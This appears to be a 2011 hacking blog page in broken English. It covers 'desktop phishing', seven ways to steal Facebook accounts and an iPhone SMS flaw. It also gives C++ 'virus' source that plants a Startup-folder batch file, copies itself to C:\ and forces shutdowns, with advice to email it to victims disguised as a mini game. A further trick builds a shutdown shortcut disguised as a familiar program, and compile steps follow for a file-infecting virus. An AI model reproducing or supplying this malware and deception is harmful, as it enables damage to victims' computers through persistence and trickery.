Monday, August 8, 2011

LATEST PHISHING


DESKTOP PHISHING IS A LATEST TYPE OF PHISHING WHICH PUT FAR AWAY ALL THE DEFECTS OF NORMAL PHISHING SUCH AS URL WHICH IS THE BEST METHOD USED BY VICTIMS TO TEST IS IT PHISHED PAGE OR ORIGINAL PAGE

In desktop phishing:-

1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.

2. Victim types the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.

HACK FACEBOOK WITH 7 TYPE



Method of data theft on facebook is a lot of interesting things in the discuss and the search. The following ways are usually used by hackers to obtain personal information of facebook account:

1. Social engineering tools: how to trick the victim to deceptive telephone and internet media,

2. Phishing tools: deceptive actions by falsifying the original site.

3. Sniffing tools: tricks to tap information on wireless computer networks or cable, using software like Able Cain - aircrack - snort - nmap.

4. Keylogger tools. almost the same as sniffing action but straight from the source intercepts every keyboard keystrokes the victim, usually a keylogger installed on computers that have public access

5. Brute force tools. This action is a direct attack by hackers to a Web site offering profile,

6. Facebook Application tools. tricks hackers can access the necessary data to your computer when you install the application on the profile. currently there are several types on facebook apikasi dangerous values are 'the Facebook users', 'the Secret Crush Check System Error', 'My Account' and 'Rule-Breaking For reported'.

7. Exploits a vulnerability tools. This is a hacking technique which is always updated, ie by finding the weakness of the system facebook site

HARD VIRAS FOR VICTOM


THIS THING IS VERY DANGEROUS AND NOT FOR JOY.

Heed my warning, but if you still want to ruin your life with jail, here you go.
Step 1, open notepad.
Step 2, paste this...
// The KILLER VIRUS
// Created bY VIRUS
//WWW.JOHNNOGIRLNOTEAR.BLOGSPOT.COM

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}
then save it as whatever you want as long as you save it to be a .exe
Email it and tell them it's a really cool mini game.
I recommend
naming it as the game you say it is.
Hope you don't ruin someone innocent's computer, Ben.

COMPUTER VIRUS FOR SHUT DOWN




2. Forced shutdown

This will display a custom error message and start a countdown which will shut down the computer.

Right-click your desktop and create a new shortcut.
Paste the following code into the Location box in the Create Shortcut
menu:shutdown -s -t 30 -c “Your message here

Replace 30 with the length of the countdown you want (in seconds) and place your custom error message between the quotes. Click next and name the shortcut to something the victim would be likely to click on such as “Internet explorer” or “My Documents”, etc
.



Next you’d want to change the icon. Right-click on the shortcut you made and click properties. Find the Change Icon button and click it. Choose a suitable icon for the name you chose earlier.
And that’s all! Now you just have to sneak the shortcut onto the victim’s desktop and run!

Note: to stop it, open Run from the start menu and type shutdown-a.

ONE MORE TIPE FOR OWN VIRAS

METHOD TO MAKE VIRUS:

This is how you can compile the code
:
1. You require Borland TC 3.0, copy the code into the compiler and press Alt+F9, it will compile the code.
2. To generate the exe file of the virus press F9. Remember, Do Not Press CTRL+F9 as this will infect your system also.
3. Note the size of the generated exe file in Bytes.
4. Modify the value of X (which is 89088 initially) in the code above with the size noted in above step.
5. Go to step 1 and step 2 again. The exe file obtained now is the Virus and is ready to infect other systems.
To Test:
1. Make a new folder and put some (any) exe files in it.
2. Also put this virus in it.
3. Run the virus and you will notice that the other exe files will get infected.
4. All the infected files are ready to reinfect.

CLICK THE LINK BELOW TO SEE THE CODE::\

IPHONE HACK



As we reported earlier today, security experts Charlie Miller and Collin Mulliner have exposed an iPhone virus that could allow criminals to control your phone just by sending a single text message (SMS). Their presentation, at the Black Hat conference in Las Vegas, is making a lot of waves, but the details are scattered or overly technical for most iPhone owners.
That’s why we’ve done some research on the information that has come out on this security vulnerability. The technical detail involved in the hack can be overwhelming, so we’re synthesizing it down to the key points – as well what you can expect. Don’t be alarmed, but be vigilant. Here’s the security breakdown:

1. The major issue is a security flaw involving SMS. Specifically, the hack can control an iPhone remotely, including your iPhone’s camera, Safari, and more. It can even send messages to friends in your address book, which is where this hack becomes scariest.
2. The hack works by sending you code in an SMS message (or a series of messages) that crashes your iPhone. After that, your iPhone is theirs to use.
3. The offending text would come in the form of a single square character. If you get the square character, turn off your phone IMMEDIATELY.
4. You only have to receive the message to get hacked; you don’t even have to do anything with the text message.
5. The flaw was discovered by noted security expert Charlie Miller, who has hacked everything from MacBook Airs to Second Life, and partner Collin Mullinger.
6. The attack was presented publicly at the Black Hat conference. The duo decided to do this after Apple gave them no response back in July, when they provided Apple with information on the security flaw. The goal is to bring attention to the flaw (which they are clearly getting).
7. According to Reuters, now that the vulnerability is exposed, hackers could build software that mounts this SMS attack within the next two weeks.
8. Apparently Google Android, Windows Mobile phones, and Palm Pres are vulnerable to similar hacks. The team demonstrated the attack on an Android phone and a Windows Mobile phone
.
While we’re still sifting through very technical information on this attack, it’s a clear reminder that no software, no computer, and no phone is safe from thieves, hackers, and harm. We’ll provide additional updates as they come from either Black Hat or Apple.

Update:
For now, your phone isn’t in immediate danger, as it will take time before malicious individuals can build the necessary code to mount this type of SMS attack. We’ll update you if that changes. Here’s Miller and Mullinger’s paper on the subject if you’d like to check it out:

HACK GOOGLE LIBRARIES AND DOWNLOAD BOOKS



If you want books, but don’t want to pay for them, there is a better way than walking into your local book store and pocketing them. Try grabbing them online, from Google!

Everyone must be aware of the Google Books Library project by now. If you’re not, it’s basically a way for Google to ensure all of the world’s book content is accessible and searchable. Through the Book Project, Google works with libraries to scan and archive their older and out of print materials. Up until recently, viewers of books in the Google Library Project web space were limited to viewing books within the browser. Not any more. Google Book Downloader is a utility that rips books from Google and saves them as PDFs so you can view them with any device or desktop that can view this file format. Using Microsoft’s .NET framework, the Google Book Downloader application allows users to enter a book’s ISBN number or Google link to pull up the desired book and begin a download, fishing off with exporting the file to a PDF. Full setup instructions and download are available on Codeplex.